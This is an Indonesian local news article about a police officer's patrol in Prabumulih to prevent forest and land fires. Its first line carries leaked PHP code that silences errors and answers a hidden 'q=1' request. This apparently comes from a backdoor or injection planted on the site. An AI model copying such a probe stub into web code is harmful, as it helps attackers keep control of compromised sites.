error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Aiptu.Redi Junison Bhabinkamtibmas Patih Galung Patroli Karhutla di Wilayah Hukum Polsek Prabumulih Barat - SMI.COM

Home / PRABUMULIH

Jumat, 2 Desember 2022 - 11:12 WIB

Aiptu.Redi Junison Bhabinkamtibmas Patih Galung Patroli Karhutla di Wilayah Hukum Polsek Prabumulih Barat

Prabumulih, SMI-

Keliling Patroli Guna mengantisipasi Karhutla, Bhabinkamtibmas Patih Galung Polsek Barat menghimbau Warga,Agar Masalah Karhutla menjadi perhatian semua pihak.Kebakaran Hutan dan Lahan (Karhutla),bisa menyebabkan polusi udara dan hal itu sangat berbahaya.Guna Mengantisipasi hal tersebut Polsek Prabumulih Barat,melalui Bhabinkamtibmas Kelurahan Patih Galung rutin melakukan patroli karhutla.

Sembari melakukan kegiatan patroli mengingatkan warga, agar tidak membuka kebun menggunakan metode membakar lahan. Karena hal itu melanggar aturan dan bisa dipidana.

“Kita patroli karhutla keliling di Kelurahan Patih Galung, mengingatkan warga agar tidak membakar hutan dan lahan,” ujar Bhabinkamtibmas Kelurahan Patih Galung, Aiptu Redi Junison kepada awak media, Jumat, 2 Desember 2022. jika dilakukan juga pelaku pembakaran lahan bisa dijerat UU PPLH, Pasal 26 bisa terancam hukuman 10 tahun dan denda Rp 10 miliar. “Maka, kita tekankan sekali lagi agar warga tidak melakukan karhutla,”Ungkapnya.

Baca Juga :  Resepsi Pernikahan Putri Sulung lr.H.Ridho Yahya, MM Walikota Prabumulih Sukses Di Gelar

Selain itu, Redi juga menekankan kepada warga guna selalu menjaga Kamtibmas di wilayahnyw,jika terjadi gangguan Kamtibmas segera melaporkan dan berkordinasi bersamanya.

Baca Juga :  Pembukaan PORSENIWADA Dalam Rangka HUT PWI dan Hari Pers Nasional Tahun 2022 Provinsi Sumatera Selatan

“Jika ada gangguan Kamtibmas, laporkan kepada saya dan akan segera ditindaklanjuti,” bebernya.

Kapolres Prabumulih, AKBP Witdiardi SIk MH melalui Kapolsek Prabumulih Barat, Iptu Arafiq SIP mengatakan, mendorong seluruh para Bhabinkamtibmas di bawah naungan agar aktif menjalankan tugas dan tanggungnya.

“Bhabinkamtibmas punya peranan penting, sebagai ujung tombak kepolisian guna meredam gangguan Kamtibmas. Dan, juga meningkatkan peran aktif masyarakat guna menjaga Kamtibmas,”Demikian tukas A.Rafiq Kapolsek Prabumulih Barat.

(Sunar)

Share :

Baca Juga

PRABUMULIH

Kurangnya Perhatian Masyarakat Sugihwaras Barat Perbaiki Jalan  Swadaya, dan Gotong-royong

PRABUMULIH

Laka Tunggal, Avanza Ringsek di Amankan di Satlantas Prabumulih

PRABUMULIH

Rangkaian HPN 2022, PWI Prabumulih Gelar Gaple CUP

BERITA

AKBP.Witdiardi SIk MH Kapolres Kota Prabumulih menerima kunjungan Danyonzipur 2/SG dan Dansubdenpom II/4 di Lounge SS

PRABUMULIH

Polsek Prabumulih Barat Amankan Tersangka Pembobol Rumah Warga

PRABUMULIH

Program Perdana Surga Jum’at Sunardi.S.Kep Lurah Patih Galung

PRABUMULIH

Polres Kota Prabumulih di Jajaran Polsek Prabumulih Barat Demi Menjaga KAMTIBMAS Siap Berikan Pelayanan Terbaik Untuk Masyarakat

PRABUMULIH

PT.Perta Samtan Gas Berbagi Di Bulan Suci Ramadhan 1443 H